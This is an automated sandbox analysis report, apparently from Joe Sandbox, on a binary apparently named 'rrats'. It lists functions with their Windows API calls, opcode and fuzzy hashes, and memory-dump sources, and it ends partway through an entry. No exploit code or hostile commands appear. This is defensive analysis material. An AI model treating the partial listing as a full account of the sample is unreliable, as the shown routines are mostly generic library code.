                                                              Similarity
                                                              • API ID: __floor_pentium4
                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                              • API String ID: 4168288129-2761157908
                                                              • Opcode ID: 56572648f5578abcc54e5af9c6105ce2cc0962c849cc100adf43838f49499196
                                                              • Instruction ID: acaf3d282290b71dd22dce5aa9a6266d9c423fa27db38f535bececcc449d75ea
                                                              • Opcode Fuzzy Hash: 56572648f5578abcc54e5af9c6105ce2cc0962c849cc100adf43838f49499196
                                                              • Instruction Fuzzy Hash: 11C23972E086288FDB25CE28DD40BEAB7B5EB45305F1541EED85EE7240E775AE818F40
                                                              Function 00CA32F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: H_prolog_swprintf
                                                              • String ID: CMT$h%u$hc%u
                                                              • API String ID: 146138363-3282847064
                                                              • Opcode ID: adb0ee080e3ee71c34e7cc1a6327e35fd7cff2541c6fbf63aa99995f9308d9d7
                                                              • Instruction ID: ad406c9547fbff3279ae05189fdabb5fb500e573eeb3ac8959e3e61a05839249
                                                              • Opcode Fuzzy Hash: adb0ee080e3ee71c34e7cc1a6327e35fd7cff2541c6fbf63aa99995f9308d9d7
                                                              • Instruction Fuzzy Hash: 5832F8715103869FDF14DF74C8A5AE93BA5AF16308F08047DFD9A8B283DB749A49CB60
                                                              Function 00CA286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00CA2874
                                                              • _strlen.LIBCMT ref: 00CA2E3F
                                                                • Part of subcall function 00CB02BA: __EH_prolog.LIBCMT ref: 00CB02BF
                                                                • Part of subcall function 00CB1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00CABAE9,00000000,?,?,?,0001046A), ref: 00CB1BA0
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CA2F91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                              • String ID: CMT
                                                              • API String ID: 1206968400-2756464174
                                                              • Opcode ID: 274f9fa9733736d25d105ce48a829e17c547c4fd505730aed28f7575b3aae032
                                                              • Instruction ID: 21d0624932639886989113e42201e11580dec51a4d9f7298c90350dc2869e111
                                                              • Opcode Fuzzy Hash: 274f9fa9733736d25d105ce48a829e17c547c4fd505730aed28f7575b3aae032
                                                              • Instruction Fuzzy Hash: 78624A715002968FDB19CF38C8957EA37A1EF56308F08457EFCAA8B283D7759A45CB60
                                                              Function 00CBF838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00CBF844
                                                              • IsDebuggerPresent.KERNEL32 ref: 00CBF910
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00CBF930
                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00CBF93A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                              • String ID:
                                                              • API String ID: 254469556-0
                                                              • Opcode ID: 245ad67ea0ae82be83ac1e40fd9e22694cc909971c62f8cb0ef73371c8f8863b
                                                              • Instruction ID: 2f71cf6470fd34a23f3ee7ab7b8892e2e8a314f073cb22a7f3a6e68f24debc68
                                                              • Opcode Fuzzy Hash: 245ad67ea0ae82be83ac1e40fd9e22694cc909971c62f8cb0ef73371c8f8863b
                                                              • Instruction Fuzzy Hash: D2312775D063199BDF21DFA4DD89BCCBBB8AF08304F1040AAE40CAB250EB719B859F45
                                                              Function 00CBE6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualQuery.KERNEL32(80000000,00CBE5E8,0000001C,00CBE7DD,00000000,?,?,?,?,?,?,?,00CBE5E8,00000004,00D01CEC,00CBE86D), ref: 00CBE6B4
                                                              • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00CBE5E8,00000004,00D01CEC,00CBE86D), ref: 00CBE6CF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: InfoQuerySystemVirtual
                                                              • String ID: D
                                                              • API String ID: 401686933-2746444292
                                                              • Opcode ID: 584ec3f361e96e69f5b0fb248c969afa05c3379a8a7fb42fe37c3f51a3987e00
                                                              • Instruction ID: 59955b587bdf4f2769ab3a948b7085f11fcf9ea6b223ca72064e682746ba31c5
                                                              • Opcode Fuzzy Hash: 584ec3f361e96e69f5b0fb248c969afa05c3379a8a7fb42fe37c3f51a3987e00
                                                              • Instruction Fuzzy Hash: 89012B326001096BDF14DF29DC09BED7BAEEFC4324F0CC121ED29E7251DA38DA058680
                                                              Function 00CC8EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00CC8FB5
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00CC8FBF
                                                              • UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 00CC8FCC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                              • String ID:
                                                              • API String ID: 3906539128-0
                                                              • Opcode ID: f920a7cfc3e8aacee4ffde55de3eb5a87c303eb1735d8e14a1b6a91b8768c62b
                                                              • Instruction ID: e173534787a22aeaaa0e87d60989fa1db3ed23d34f734c05cfc4eb8701a2a01d
                                                              • Opcode Fuzzy Hash: f920a7cfc3e8aacee4ffde55de3eb5a87c303eb1735d8e14a1b6a91b8768c62b
                                                              • Instruction Fuzzy Hash: 1D31C275901229ABCB21DF68DC89BDDBBB8AF48310F5041EAE41CA7250EB709F858F55
                                                              Function 00CCB348 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .
                                                              • API String ID: 0-248832578
                                                              • Opcode ID: 1e1560f7bb6d8aea14d77d7346ddae0a236274da3ddada5011457db606609066
                                                              • Instruction ID: 8dbe0796bbee5fc6e461fe488332b62a7127fdf3bcc76389afabdb6c2743b7a2
                                                              • Opcode Fuzzy Hash: 1e1560f7bb6d8aea14d77d7346ddae0a236274da3ddada5011457db606609066
                                                              • Instruction Fuzzy Hash: A531E6719002496FCB28DEB8CC85FFB7BBDDB85314F1441ACE92997252EB309E459B50
                                                              Function 00CCD440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                              • Instruction ID: c6284ee5487deb50fad0ebce37c42d731e55e94a319bc17cbcf416f86d01abfa
                                                              • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                              • Instruction Fuzzy Hash: 1502FC71E002199BDF14DFA9D980BADB7F1EF48314F25816EE91AE7384D731AA41CB90
                                                              Function 00CBAF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00CBAF35
                                                              • GetNumberFormatW.KERNEL32(00000400,00000000,?,00CDE72C,?,?), ref: 00CBAF84
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: FormatInfoLocaleNumber
                                                              • String ID:
                                                              • API String ID: 2169056816-0
                                                              • Opcode ID: 420ee20afe06dc38b0ba399e2350d28c0c5d8a4c5ab884e937297fe6921e1abf
                                                              • Instruction ID: 2d67d9677fbc8055bee64332ed5e28888d5c95e43316d974a205c65810466b91
                                                              • Opcode Fuzzy Hash: 420ee20afe06dc38b0ba399e2350d28c0c5d8a4c5ab884e937297fe6921e1abf
                                                              • Instruction Fuzzy Hash: 9A015E7A200359AAD7109FA4DC45FAF77B8EF08710F015026FB1597250D3709915CBA6
                                                              Function 00CA6C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(00CA6DDF,00000000,00000400), ref: 00CA6C74
                                                              • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00CA6C95
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: ErrorFormatLastMessage
                                                              • String ID:
                                                              • API String ID: 3479602957-0
                                                              • Opcode ID: 540ec87b02a9d069a4bc02da7f90ec5a75ed05c5d1dda172e492364c43090241
                                                              • Instruction ID: 72bf21c68f3580f77205353af29f44920c3faaa5dcfbf65244c4ed91bbc8f493
                                                              • Opcode Fuzzy Hash: 540ec87b02a9d069a4bc02da7f90ec5a75ed05c5d1dda172e492364c43090241
                                                              • Instruction Fuzzy Hash: 05D0C731345301BFFA110B614D06F1E7B59BF55B95F18C4057755D40E0D6749514A615
                                                              Function 00CD19F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00CD19EF,?,?,00000008,?,?,00CD168F,00000000), ref: 00CD1C21
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: ExceptionRaise
                                                              • String ID:
                                                              • API String ID: 3997070919-0
                                                              • Opcode ID: 4b00c7b19df80a82e286b6963e8d36df2a0d3a871de5f1556bb97e788a348217
                                                              • Instruction ID: 47d8e45faf2e8bb860e091777073412090d8adc0421020aafab85efc4d74d3d8
                                                              • Opcode Fuzzy Hash: 4b00c7b19df80a82e286b6963e8d36df2a0d3a871de5f1556bb97e788a348217
                                                              • Instruction Fuzzy Hash: D2B14E71220609AFD715CF28C486B657BE0FF45364F29865AE9AACF3A1C335DA91CB40
                                                              Function 00CBF654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00CBF66A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: FeaturePresentProcessor
                                                              • String ID:
                                                              • API String ID: 2325560087-0
                                                              • Opcode ID: dd4b9f585de4fb4d01dc5f050ff473508cc9036a084e156099ebf8b6ebf9b307
                                                              • Instruction ID: ace4db2849967ba212ea7b737f1a511afa2d27beab67c363bef125fb521ddc1e
                                                              • Opcode Fuzzy Hash: dd4b9f585de4fb4d01dc5f050ff473508cc9036a084e156099ebf8b6ebf9b307
                                                              • Instruction Fuzzy Hash: 23519DB19016198FEB25CF94EC817AEBBF0FB48304F24846AD415EB391D7759A01CB60
                                                              Function 00CAB146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetVersionExW.KERNEL32(?), ref: 00CAB16B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Version
                                                              • String ID:
                                                              • API String ID: 1889659487-0
                                                              • Opcode ID: b6d4d38524100840bc8dc3147b0551a9c7a64b8e38297954088b8773f57f5ed5
                                                              • Instruction ID: 4fe3a8d608af4eacb1c34c9333941b7c7576d1f6e258ccdbd006a63a2169262f
                                                              • Opcode Fuzzy Hash: b6d4d38524100840bc8dc3147b0551a9c7a64b8e38297954088b8773f57f5ed5
                                                              • Instruction Fuzzy Hash: 9DF01DB5D002488FDB18DB18EC917DD77F1E749319F14429ADA2597390C370AE90CE61
                                                              Function 00CA40FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: gj
                                                              • API String ID: 0-4203073231
                                                              • Opcode ID: 863b3caa624afaaca67ebd4aefed3b64d5ec18a988eab2630c6572fb9e7c70ec
                                                              • Instruction ID: d4f2628b6cac4198afda2990819e6630062a0cd8c4436917ac5e8abdfdcb6313
                                                              • Opcode Fuzzy Hash: 863b3caa624afaaca67ebd4aefed3b64d5ec18a988eab2630c6572fb9e7c70ec
                                                              • Instruction Fuzzy Hash: 26C14672A183818FC354CF29D88065AFBE1BFC8308F19892EE998D7351D734E945CB96
                                                              Function 00CBF9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00CBF3A5), ref: 00CBF9DA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: 57b785fb7f9f5ea7f8034d53b6de70f77d99a3b6b90ac7b8ba775b8fdec1cf05
                                                              • Instruction ID: 5153fed595bfdc0d7ff2c6595a259234487630d14be924f87b5fa943c3f72048
                                                              • Opcode Fuzzy Hash: 57b785fb7f9f5ea7f8034d53b6de70f77d99a3b6b90ac7b8ba775b8fdec1cf05
                                                              • Instruction Fuzzy Hash:
                                                              Function 00CCC030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: HeapProcess
                                                              • String ID:
                                                              • API String ID: 54951025-0
                                                              • Opcode ID: 7026d86e24307fc3f3231268b99caaaf5925f6186d97bf77070ccfc7ebc7d8bf
                                                              • Instruction ID: 2adc24e9dfd606526e0d03dc48b22c0361187f80cd211f7cd4ca0c6396f654c7
                                                              • Opcode Fuzzy Hash: 7026d86e24307fc3f3231268b99caaaf5925f6186d97bf77070ccfc7ebc7d8bf
                                                              • Instruction Fuzzy Hash: 20A02230203302CFCB00CF30AF0C30C3BE8AA003E0308002BA00CC0230EF3080A0AB22
                                                              Function 00CB62CA Relevance: .8, Instructions: 829COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
                                                              • Instruction ID: e555325c9aaf8688fc40acd03ba8c30853f091d3092d1872c0cba28d93197e14
                                                              • Opcode Fuzzy Hash: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
